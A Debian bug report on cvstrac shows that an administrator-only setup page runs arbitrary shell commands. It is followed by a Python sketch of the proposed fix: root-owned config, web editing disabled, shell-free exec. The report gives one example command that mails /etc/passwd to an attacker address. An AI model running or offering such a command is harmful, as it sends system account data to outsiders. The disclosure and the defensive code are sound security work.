Package: cvstrac
Severity: normal

cvstrac has a potential security issue, whereby if a hacker gains knowledge of the administrative password, he can gain access to shell commands and compromise the whole system.
Here is the issue:

The hacker obtains the administrative password via brute force, or other means. He now logs onto cvstrac as an administrator. To access the shell commands, the user can now navigate the menus as follows:

  Setup
  Diff & Filter Commands

The user can now enter malicious shell commands in the text box, for example:

  cat /etc/passwd|mail hac...@badguys.net

It would be better if any shell commands used by cvstrac were stored in a configuration file /etc/cvstrac/cvsconfig.conf rather than enabling them to be edited via the cvstrac interface, or a facility was provided to disable this configuration option.

Mark.

-- System Information:
Debian Release: 5.0.2
  APT prefers stable
  APT policy: (990, 'stable'), (50, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-2-486
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages cvstrac depends on:
ii  libc6          2.7-18     GNU C Library: Shared libraries
ii  libsqlite3-0   3.5.9-6    SQLite 3 shared library
pn  rcs            <none>     (no description available)

cvstrac recommends no packages.

cvstrac suggests no packages.
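One way to implement the reporter's two suggestions, written here as an added example and not taken from cvstrac's code base: external command templates are read from a root-owned file at the proposed path instead of the web form, web-entered templates are ignored unless an explicit switch enables them, and templates are expanded into an argv list for a shell-free exec so that a pipe or redirection in a template stays a literal argument. The config format, the function names and the sample file contents are assumptions of this example.

```python
import os
import shlex
import stat

# Path proposed in the bug report; the file contents below are constructed.
CONFIG_PATH = "/etc/cvstrac/cvsconfig.conf"
SAMPLE_CONFIG = """# name = command template; %1, %2 ... are replaced by arguments
diff   = diff -u %1 %2
filter = cat %1
"""

def check_config_perms(path, st=None):
    """Only trust a command file that root owns and only root can write."""
    st = st if st is not None else os.stat(path)
    if st.st_uid != 0:
        raise PermissionError(f"{path}: must be owned by root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError(f"{path}: must not be group/world-writable")
    return True

def parse_commands(text):
    """Parse 'name = template' lines; '#' starts a comment."""
    cmds = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, _, template = line.partition("=")
        cmds[name.strip()] = template.strip()
    return cmds

def effective_commands(file_cmds, web_cmds, allow_web_edit=False):
    """The 'disable' facility: templates entered through the web UI are
    ignored unless the file-based configuration explicitly allows them."""
    if not allow_web_edit:
        return dict(file_cmds)
    return {**file_cmds, **web_cmds}

def build_argv(template, args):
    """Expand %N tokens as whole argv entries. The result is meant for an
    execv-style call (subprocess.run(argv, shell=False)), so '|', ';' or
    '>' in the template or in a filename remain literal arguments."""
    argv = []
    for tok in shlex.split(template):
        if len(tok) == 2 and tok[0] == "%" and tok[1].isdigit():
            argv.append(args[int(tok[1]) - 1])
        else:
            argv.append(tok)
    return argv
```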